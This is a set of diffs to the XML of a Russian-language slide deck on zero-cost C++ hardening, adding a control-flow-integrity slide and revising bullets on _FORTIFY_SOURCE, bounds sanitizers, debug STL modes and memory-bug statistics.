-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C6C92A7-677E-4576-AB17-AD95F9FAA24A}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Control-Flow Integrity</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2791C595-BB19-499F-BED4-456F80ABC843}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3818483602"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -21813,6 +21943,89 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C6C92A7-677E-4576-AB17-AD95F9FAA24A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Control-Flow Integrity</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Text Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2791C595-BB19-499F-BED4-456F80ABC843}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3818483602"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide71.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB5F15B-5D95-4693-97B3-F5B5E3D2B3C4}"/>
               </a:ext>
             </a:extLst>
@@ -21878,7 +22091,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide71.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide72.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21962,7 +22175,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide72.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide73.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22314,7 +22527,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide73.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide74.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22530,7 +22743,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide74.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide75.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -333,7 +333,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -531,7 +531,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -739,7 +739,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -937,7 +937,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1212,7 +1212,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1477,7 +1477,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1889,7 +1889,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2030,7 +2030,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2143,7 +2143,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2454,7 +2454,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2742,7 +2742,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2983,7 +2983,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/9/2025</a:t>
+              <a:t>7/10/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -10638,7 +10638,30 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>2% </a:t>
+              <a:t>-D_FORTIFY_SOURCE=2: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет изменений при компиляции </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CGBuiltin.cpp </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>компилятором </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-D_FORTIFY_SOURCE=3: 2% </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -10654,7 +10677,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang (-D_FORTIFY_SOURCE=3)</a:t>
+              <a:t>Clang</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -11242,7 +11265,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опция компилятора </a:t>
+              <a:t>Опция </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -11254,7 +11277,42 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=bounds</a:t>
+              <a:t>=bounds </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в компиляторах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Аналог </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>_FORTIFY_SOURCE=2: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>массивы константных размеров или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>VLA</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -11303,14 +11361,13 @@
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>как такое может быть</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Аналогично </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>_FORTIFY_SOURCE=2</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -19110,8 +19167,15 @@
               <a:t>Например </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-D_GLIBCXX_DEBUG </a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_GLIBCXX_DEBUG</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -19130,16 +19194,29 @@
               <a:t>или </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-D</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>_</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LIBCPP_ABI_BOUNDED_ITERATORS </a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>LIBCPP_ABI_BOUNDED_ITERATORS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -12737,7 +12737,7 @@
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -12784,7 +12784,15 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Испортить данные в несвязанном буфере (например указатели на функции)</a:t>
+              <a:t>Испортить данные в несвязанном буфере (например указатели на функции или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>vtables</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -16261,6 +16269,43 @@
           </a:p>
           <a:p>
             <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>70% high/critical </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>багов в проекте </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chromium – </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ошибки</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>памяти</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Chromium Security: Memory Safety</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>40% атак, вызванных ошибками работы с памятью</a:t>
             </a:r>
@@ -16281,46 +16326,9 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
+                <a:hlinkClick r:id="rId5"/>
               </a:rPr>
               <a:t>Google Project Zero</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>70% high/critical </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>багов в проекте </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chromium – </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ошибки</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>памяти</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>Chromium Security: Memory Safety</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -19126,7 +19134,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -19151,6 +19159,22 @@
             </a:r>
           </a:p>
           <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Может ограниченно использоваться в проде для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>A/B </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>тестирования</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Отладочные проверки </a:t>
@@ -19228,17 +19252,23 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++ (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>меняют </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>ABI !)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
+              <a:t>++</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Меняют </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ABI =&gt; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>требуется полная пересборка зависимостей</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:r>
@@ -19276,20 +19306,46 @@
           </a:p>
           <a:p>
             <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Другие инструменты</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
               <a:t>ElectricFence</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Только </a:t>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>только </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>heap overflow</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>DirtyFrame</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.</a:t>
             </a:r>
           </a:p>
         </p:txBody>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -333,7 +333,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -531,7 +531,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -739,7 +739,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -937,7 +937,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1212,7 +1212,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1477,7 +1477,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1889,7 +1889,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2030,7 +2030,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2143,7 +2143,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2454,7 +2454,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2742,7 +2742,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2983,7 +2983,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/10/2025</a:t>
+              <a:t>7/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4726,7 +4726,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="10237694" y="3124845"/>
-            <a:ext cx="1719530" cy="1477328"/>
+            <a:ext cx="1719530" cy="830997"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4740,17 +4740,17 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
               <a:t>David &amp; Angie, </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
+              <a:rPr lang="en-US" sz="1200" dirty="0">
                 <a:hlinkClick r:id="rId3"/>
               </a:rPr>
               <a:t>https://www.flickr.com/photos/studiomiguel/3946174063</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
               <a:t> </a:t>
             </a:r>
           </a:p>
@@ -5966,7 +5966,10 @@
               <a:rPr lang="en-US" dirty="0" err="1"/>
               <a:t>libc</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
